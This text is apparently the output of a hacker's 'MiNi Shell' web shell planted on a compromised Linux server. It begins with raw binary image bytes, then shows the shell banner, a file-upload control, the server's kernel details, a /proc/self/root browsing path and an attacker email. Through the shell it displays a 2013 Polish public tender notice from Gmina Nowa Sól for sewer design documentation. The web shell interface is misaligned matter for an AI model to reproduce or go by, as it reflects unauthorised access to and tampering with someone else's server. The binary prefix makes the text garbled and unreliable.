JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131107/454018-N-2013.html

<p class="kh_header"><b>Nowa Sól: Wykonanie dokumentacji projektowo kosztorysowej na budowę kanalizacji sanitarnej wraz z przyłączami do  nieruchomości w miejscowości Lubięcin i odprowadzeniem ścieków do oczyszczali ścieków zlokalizowanej na działce ewidencyjnej nr 277/6 oraz pełnienie nadzoru autorskiego.</b><br>
<b>Numer ogłoszenia: 454018 - 2013; data zamieszczenia: 07.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowa Sól , ul. Moniuszki 3a, 67-100 Nowa Sól, woj. lubuskie, tel. 068 3872016 w. 28, faks 068 3873277.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminanowasol.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo kosztorysowej na budowę kanalizacji sanitarnej wraz z przyłączami do  nieruchomości w miejscowości Lubięcin i odprowadzeniem ścieków do oczyszczali ścieków zlokalizowanej na działce ewidencyjnej nr 277/6 oraz pełnienie nadzoru autorskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie wstępnej koncepcji budowy kanalizacji, która podlegać będzie
zatwierdzeniu przez Zamawiającego. Na podstawie zatwierdzonej koncepcji Wykonawca opracuje dwie oddzielne dokumentacje projektowo-kosztorysowe sieci rozdzielczej kanalizacji sanitarnej z przyłączami do budynków (ze studnią rewizyjną do 2m od granicy działki po stronie właściciela, lub bezpośrednio do budynku, jeżeli znajduje się w odległości do 4 m od granicy działki). Na terenach zabudowy mieszkaniowej należy przewidzieć tłoczenie ścieków. Przed przystąpieniem do prac projektowych Wykonawca zobowiązany jest zapoznać się z terenem obejmującym zakres zamówienia. Projektowana sieć kanalizacji sanitarnej przebiegać będzie pod rowem melioracji podstawowej oraz torami kolejowymi, a także drogami wojewódzkimi, powiatowymi i gminnymi. Na odcinku wyremontowanej drogi wojewódzkiej tj. od skrzyżowania z drogą powiatową do początkowych numerów miejscowości planuje się prowadzenie sieci z ominięciem drogi wojewódzkiej, działkami prywatnymi z obu stron, poza budynkami (ok. 50 działek).
Wykonawca zobowiązany jest do lokalizowania trasy sieci i studni kanalizacyjnych w ciągach pieszych, poboczach dróg publicznych, a w jezdni w połowie długości jednego pasa jezdni tak, aby studnie znajdowały się pomiędzy kołami przejeżdżających pojazdów. 

1.2. Zakres zamówienia obejmuje: 
-	Opracowanie map do celów projektowych,
-	Wykonanie badań geotechnicznych dla rurociągów i przepompowni,
- 	Opracowanie koncepcji budowy kanalizacji wraz z podpisanymi umowami z Właścicielami nieruchomości, 	przez które przebiegać będzie sieć rozdzielcza i lokalizowane przepompownie,
-	Projekt kanalizacji grawitacyjnej z przyłączami,
-	Projekt rurociągu tłocznego, 
-	Projekt przepompowni z uwzględnieniem monitoringu (sygnału na telefon komórkowy i wizualizacja na monitorze w oczyszczalni ścieków o awarii pomp, 
-	Projekt zasilania przepompowni i jej oświetlenia,  
-	Uzyskanie warunków technicznych dla przyłącza energetycznego przepompowni, 
-	Przygotowanie niezbędnych materiałów i złożenie wniosku o uzyskanie decyzji o warunkach lokalizacji
   	inwestycji celu publicznego, 
-	Przygotowanie niezbędnych materiałów i złożenie wniosku o wydania decyzji o środowiskowych
 	uwarunkowaniach zgody na realizację inwestycji wraz z opracowaniem raportu oddziaływania na 	środowisko, jeśli zajdzie taka potrzeba,
-	Opracowanie operatu wodno prawnego i uzyskanie pozwolenia wodno-prawnego na przejścia po rowem 
       i odwodnienie wykopów 
-	Opracowanie informacji dot. Bezpieczeństwa i ochrony zdrowia, 
-	Opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych, 
-	Opracowanie przedmiarów i kosztorysów inwestorskich - w przedmiarach i kosztorysach należy 	wyodrębnić sieci, przyłącza, przepompownie w zakresie uzgodnionym z Zamawiającym, przy czym 	przedmiar i kosztorys inwestorski opracować w rozdzieleniu na dwa uzgodnione z Zamawiającym	etapy oraz w rozbiciu na koszty kwalifikowane, niekwalifikowane i ogólne, zgodnie z 
      rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi w sprawie szczegółowych warunków i trybu 
      przyznawania pomocy finansowej.
-	Uzyskanie niezbędnych uzgodnień z instytucjami opiniodawczymi wraz z uzyskaniem pisemnej zgody (w 	formie umowy) właścicieli działek oraz władających nieruchomościami gruntowymi, na których będzie 	prowadzona inwestycja ze wskazaniem w uzgodnieniu lokalizacji budowanego obiektu (sieci, przyłącza, 	przepompownie itp.)
-	Przygotowanie oddzielnych wniosków o pozwolenie na budowę oraz uzyskania prawomocnych pozwoleń na budowę.
-	Pełnienie nadzoru autorskiego w okresie prowadzonych prac budowlanych.

1.3. Opracowania powinny zawierać - oddzielnie dla etapu 1-go i 2-go:
-	mapy do celów projektowych
- 	koncepcja do uzgodnienia		- 2 egz. + CD
-	Badania geotechniczne		- 2 egz. + CD
- 	projekt budowlano-wykonawczy kanalizacji sanitarnej, sporządzony zgodnie z przepisami prawa 	budowlanego i przepisami wykonawczymi w zakresie określonym w Rozporządzeniu Ministra 	Infrastruktury z dnia  02 września 2004 r. w  sprawie szczegółowego zakresu i formy dokumentacji 	projektowej	                             - 5 egz.+ CD
- 	przedmiar robót			- po 2 egz. + CD dla 2-ch uzgodnionych etapów
- 	kosztorys inwestorski		- po 2 egz. + CD dla 2-ch uzgodnionych etapów
- 	wzór kosztorysu ofertowego 	- po 2 egz. + CD dla 2-ch uzgodnionych etapów
- 	szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych	- 3 egz. + CD
- 	operat wodnoprawny 							- 4 egz. + CD
- 	raport oddziaływania na środowisko (jeśli będzie wymagany)			- 4 egz. + CD

2. Projekty powinny być zaopatrzone w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że są wykonane zgodnie z umową, obowiązującymi przepisami i normami oraz, że zostają wydane w stanie kompletnym z punktu widzenia celu, któremu mają służyć.
  	Wykaz opracowań oraz pisemne oświadczenie, o którym mowa wyżej stanowią integralną część przedmiotu odbioru. 

3. Zakres nadzoru autorskiego. 
 
3.1.	Wykonawca zobowiązuje się do sprawowania nadzoru autorskiego w zakresie obejmującym w 	szczególności: 
	-	stwierdzanie w toku wykonywania robót budowlanych zgodności realizacji tych robót z dokumentacją 	projektową; 
	-	 wyjaśnianie wątpliwości powstałych w toku realizacji robót dot. projektu budowlanego i wykonawczego i 	zawartych w nim rozwiązań oraz ewentualne uszczegóławianie dokumentacji projektowej oraz poprawianie 	błędnych rozwiązań projektowych; 
-		uzgadnianie z Zamawiającym i Wykonawcą robót możliwości wprowadzenia rozwiązań zamiennych w 	stosunku do przewidzianych w dokumentacji projektowej, w odniesieniu do materiałów i konstrukcji oraz 	rozwiązań technicznych i technologicznych zgłoszonych przez kierownika budowy lub inspektora nadzoru 	inwestorskiego; 
-		żądanie wstrzymania robót budowlanych w razie stwierdzenia możliwości powstania zagrożenia lub 	wykonywania robót niezgodnie z dokumentacją projektową. 
3.2.	Wynagrodzenie powyższe obejmuje do 10 pobytów projektantów wszystkich branż na budowie. 
3.3.	O konieczności przeprowadzenia nadzoru autorskiego, Wykonawca będzie informowany z dwudniowym 			wyprzedzeniem (dwóch dni roboczych).
3.4.	Przedstawiciel Wykonawcy jest zobowiązany najpóźniej w ciągu dwóch dni roboczych udzielić odpowiedzi 	na pytania Zamawiającego związane z realizacją zadania, o którym mowa w § 2., na życzenie 	Zamawiającego w formie pisemnej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiazany do wniesienia wadium w wysokości 3000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że: wykonał co najmniej 2 usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że: Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 300 000,00 PLN (słownie: trzysta tysięcy złotych) wraz z opłaconą składką</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta na wykonanie zamówienia - wypełniony Formularz Nr 1. 
Dowód wniesienia wadium dla formy innej niż pieniądz oryginał gwarancji lub poręczenia.Pełnomocnictwo Pełnomocnictwa dla osoby osób podpisujących ofertę, jeżeli upoważnienie takie nie wynika wprost z dokumentów rejestracyjnych firmy Formularz nr 2.Podwykonawstwo - wypełniony Formularz Nr 5 z wykazem zakresów robót jakich wykonanie Wykonawca zamierza zlecić Podwykonawcom. W przypadku nie korzystania z podwykonawców wpisać NIE DOTYCZY
Informacje o podmiotach wspólnie ubiegających się o przyznanie zamówienia 
z oświadczeniem wykonawców wspólnie ubiegających się o przyznanie zamówienia  - zgodnie z Formularzem Nr 6. W przypadku Wykonawców nie składających ofert wspólnych wpisać NIE DOTYCZY</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w następującym zakresie: 
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego, 
- z powodu wystąpienia okoliczności, których nie można było przewidzieć w chwili zawierania umowy, a nie wprowadzenie tych zmian powodowałoby niemożność wykonania przedmiotu zamówienia, 
- z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, 
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
-okoliczności  uniemożliwiające terminową realizację zadań niezawiniona przez żadną ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminanowasol.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nowa Sól ul. Moniuszki 3 a, 67-100 Nowa Sól , pok. nr 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2013 godzina 10:00, miejsce: Urząd Gminy Nowa Sól ul. Moniuszki 3 a, 67-100 Nowa Sól , biuro podawcze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com